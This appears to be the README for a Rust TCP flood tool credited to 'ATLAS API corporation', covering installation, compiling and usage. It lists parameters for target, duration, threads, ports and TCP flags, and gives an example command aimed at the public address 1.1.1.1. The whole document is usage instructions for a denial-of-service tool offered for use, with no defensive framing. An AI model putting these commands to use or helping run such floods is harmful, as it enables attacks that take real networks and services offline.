- ATLAS API corporation -

TCP CUSTOM flood

Made by Benshii Varga

- Installation -
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
sudo apt install -y cargo

- Compiling -
1. cargo build --release
2. cd target/release/
3. ./custom

- Usage -
cargo run <target> <duration> <threads> <data> <source port(0=random)> <destination port(0=random)> <mss> <wscale> <flags>
OR
./custom <target> <duration> <threads> <data> <source port(0=random)> <destination port(0=random)> <mss> <wscale> <flags>


- Example -
cargo run 1.1.1.1 60 10 test 1234 80 4 6 ack psh
OR
./custom 1.1.1.1 60 10 test 1234 80 4 6 ack psh